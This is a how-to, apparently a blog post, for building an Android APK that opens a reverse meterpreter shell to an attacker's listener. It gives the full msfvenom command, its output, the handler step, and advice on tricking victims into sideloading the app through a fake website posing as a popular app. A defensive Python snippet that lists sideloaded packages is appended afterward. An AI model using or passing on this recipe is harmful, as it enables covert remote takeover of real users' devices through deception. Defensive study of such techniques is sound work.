In this small How-to I will show the steps needed to create an Android APK application containing a reverse meterpreter payload. It is actually quite easy, and the hard part will be to make the victim install the application. Metasploit already has the capability to generate APK packages, so the only task left for you is to generate the payload using the msfvenom tool that comes with the Metasploit framework. In this example, most options are left at their default values, which lets msfvenom autodetect and choose the correct options for the payload.
The only options that are required for you to select are:
- The payload
- The LHOST option, which defines the public IP address the meterpreter will connect back to.
- The LPORT option, which defines the port number the meterpreter will connect to.
- The name of the output APK file.
In this example the chosen options are as follows:
- Payload: "android/meterpreter/reverse_tcp"
- lhost=10.0.0.2
- lport=4444
- Output file: "/root/fun.apk"
The next thing to do is to execute the msfvenom command with the options we selected for the APK application (the prompt's user and host name were lost in extraction and are shown as placeholders):
```
<user>@<host>:~/temp# msfvenom -p android/meterpreter/reverse_tcp lhost=10.0.0.2 lport=4444 -o /root/fun.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8775 bytes
Saved as: /root/fun.apk
```
The fun.apk file has now been generated and is a valid Android application called "MainActivity" (worth knowing in case you want to remove it after testing). The application will run by itself once it has been installed, and again whenever the device is restarted. The rest is up to the end user.
The hard part from here on is to make a user install the application, and of course social engineering comes to mind. The easiest way may be to create a professional-looking website and place the application on that website, available for download. The application should represent something irresistible, or at least something the user wants. One possibility is to present the application as an already existing application that is very popular. By default, Android devices will not allow installation of applications from Unknown Sources outside Google Play, and the trick is to make the user disable this security feature. As with most things related to social engineering, trust is the key. If the website actually contains instructions on how to disable this feature, the user may think that, if there is a guide or instructions on how to do it, it must be safe to do. This is called Sideloading: installing Android applications from a source other than Google Play.
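A defender-side check for the sideloading risk described above, as an added example that is not part of the original how-to: it parses the output of `adb shell pm list packages -i` (sample output constructed here; the package names are made up) to list packages that did not come from Google Play, and interprets the pre-Android-8 `install_non_market_apps` secure setting that backs the device-wide "Unknown sources" toggle.

```python
import re
from typing import Dict, List

# Installer package names treated as a trusted store for this check
# (assumption: only Google Play counts as trusted here).
TRUSTED_INSTALLERS = {"com.android.vending"}

# One line of `adb shell pm list packages -i` output looks like:
#   package:com.android.chrome  installer=com.android.vending
#   package:com.example.sideloaded  installer=null
LINE_RE = re.compile(r"^package:(?P<pkg>\S+)\s+installer=(?P<inst>\S+)\s*$")


def parse_installer_listing(text: str) -> Dict[str, str]:
    """Map package name -> installer package ('null' when none was recorded)."""
    result: Dict[str, str] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            result[m.group("pkg")] = m.group("inst")
    return result


def sideloaded_packages(listing: Dict[str, str]) -> List[str]:
    """Packages whose installer is not a trusted store. An installer of 'null'
    (adb install) or the system package installer (browser download, file
    manager) means the app was sideloaded rather than fetched from the store."""
    return sorted(pkg for pkg, inst in listing.items()
                  if inst not in TRUSTED_INSTALLERS)


def unknown_sources_enabled(setting_value: str) -> bool:
    """Interpret `adb shell settings get secure install_non_market_apps`:
    '1' means sideloading is allowed; '0' or 'null' (never written) means not."""
    return setting_value.strip() == "1"


# Constructed sample output, not captured from a real device.
SAMPLE_LISTING = """\
package:com.android.chrome  installer=com.android.vending
package:com.example.sideloaded  installer=null
package:com.example.bank  installer=com.android.vending
package:com.example.game  installer=com.google.android.packageinstaller
"""

if __name__ == "__main__":
    listing = parse_installer_listing(SAMPLE_LISTING)
    for pkg in sideloaded_packages(listing):
        print(f"sideloaded: {pkg} (installer={listing[pkg]})")
    print("Unknown sources enabled:", unknown_sources_enabled("1"))
```

On a device you would feed it the live `adb shell` output instead of `SAMPLE_LISTING`; a freshly sideloaded package with a `null` installer that also registers to start at boot is exactly the footprint the how-to above produces.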
To receive the reverse meterpreter session you have to start the multi/handler in a Metasploit console and wait for the Android device to spawn a session.